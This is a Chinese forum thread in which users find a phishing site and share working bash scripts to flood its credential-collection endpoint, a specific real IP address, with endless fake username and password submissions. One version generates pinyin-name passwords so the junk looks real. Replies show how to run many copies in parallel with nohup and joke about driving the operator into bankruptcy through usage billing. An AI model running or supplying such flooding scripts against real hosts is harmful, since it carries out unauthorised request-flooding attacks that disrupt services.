这个是不是新剑皇？

嗷嗷

有个MJJ发了个钓鱼网站
https://4414.19990909.workers.dev/thread-687916-1-1.html

用的良心云香港的COS

看了一下，没有什么图片之类的，不能刷流量了，不过好像可以刷请求数？

————————————————————————————————————————

他这个钓鱼提交数据请求的是http://139.155.39.99/web/test.php

post参数是u=账号&p=密码&bianhao=1

贴一个无限提交账号密码的脚本吧，把他数据库塞满

保存为sh文件，然后执行即可，报错提示缺少什么就装什么，应该就是curl和head

或者干脆先安装一下，例【yum install -y curl head】【apt insatll -y curl head】

1. url="http://139.155.39.99/web/test.php"
   
2. while true
   
3. do
   
4. u=$(echo $(date +%N) | head -c $(($RANDOM%4+6)))
   
5. p=$(date +%s%N | md5sum | head -c $(($RANDOM%9+8)))
   
6. curl -X POST -d "u=$u&p=$p&bianhao=1" --connect-timeout 3 -m 6 $url
   
7. echo "账号$u密码$p已经提交"
   
8. done

复制代码

账号是随机的6~9位数字
密码是随机的8~16位【英文+数字】。

来个升级版

密码为名字拼音+数字的组合，更像密码

如sunqing1990，liyong2018，zhaoqiang1314，baiyanjie1990，sunwei2016

我估计坛子里真有人密码是这样的

别笑我数组定义写法，我试过一行写完，但是会出奇怪的问题

1. url="http://139.155.39.99/web/test.php"
   
2. xing[0]="zhang"
   
3. xing[1]="li"
   
4. xing[2]="shen"
   
5. xing[3]="liu"
   
6. xing[4]="bai"
   
7. xing[5]="sun"
   
8. xing[6]="han"
   
9. xing[7]="zhao"
   
10. xing[8]="lu"
    
11. xing[9]="zhu"
    
12. xing[10]="long"
    
13. ming[0]="tianjun"
    
14. ming[1]="wei"
    
15. ming[2]="xiuying"
    
16. ming[3]="jing"
    
17. ming[4]="yong"
    
18. ming[5]="qiang"
    
19. ming[6]="yanjie"
    
20. ming[7]="xia"
    
21. ming[8]="xiuming"
    
22. ming[9]="xiao"
    
23. ming[10]="xiaotian"
    
24. ming[11]="xiaojun"
    
25. ming[12]="shuai"
    
26. ming[13]="dan"
    
27. ming[14]="lihui"
    
28. ming[15]="jingfeng"
    
29. ming[16]="qiuyu"
    
30. ming[17]="yunjie"
    
31. ming[18]="qing"
    
32. ming[19]="baiju"
    
33. ming[20]="yuejun"
    
34. ming[21]="leijun"
    
35. ming[22]="jinghong"
    
36. ming[23]="chengkai"
    
37. ming[24]="changyong"
    
38. ming[25]="lihua"
    
39. ming[26]="meng"
    
40. num[0]="520"
    
41. num[1]="666"
    
42. num[2]="1995"
    
43. num[3]="2020"
    
44. num[4]="2016"
    
45. num[5]="2019"
    
46. num[6]="1314"
    
47. num[7]="123"
    
48. num[8]="2017"
    
49. num[9]="2018"
    
50. num[10]="1990"
    
51. while true
    
52. do
    
53. u=$(echo $(date +%N) | head -c $(($RANDOM%4+6)))
    
54. p=${xing[$(($RANDOM%11))]}${ming[$(($RANDOM%27))]}${num[$(($RANDOM%11))]}
    
55. curl -X POST -d "u=$u&p=$p&bianhao=1" --connect-timeout 3 -m 6 $url
    
56. echo "账号$u密码$p已经提交"
    
57. done

复制代码

嗷嗷

Moriarty 发表于 2020-5-12 00:47
有没有办法多线程，我试了试开多个screen，速度一样很快。
可以批量建立screen并开刷也行
...

可以，假设把脚本保存成了jianhuang.sh，就可以用nohup后台运行，运行几次就是几线程

1. nohup bash jianhuang.sh > /dev/null 2>&1 &

复制代码

tir

看看他是按量计费，还是固定带宽
按量计费的话这个比OSS刷起来还舒服 1块钱1G，1小时破产 哈哈哈

我是大水逼

请求数太便宜了，没意思

未完成

学会了新的刷剑皇方法，在hostloc又学到了奇怪的技能

Moriarty

zzidc 发表于 2020-5-12 00:06
echo "账号$u密码$p已经提交"
这个是啥账号和密码

看上面几行代码，这是随机生成的假账号密码

riwsh

剑皇新路子之随机帐号密码塞爆数据库

ZHT5178

可以出征了？

嗷嗷

ZHT5178 发表于 2020-5-12 00:33
可以出征了？

可以开炮了

Moriarty

有没有办法多线程，我试了试开多个screen，速度一样很快。
可以批量建立screen并开刷也行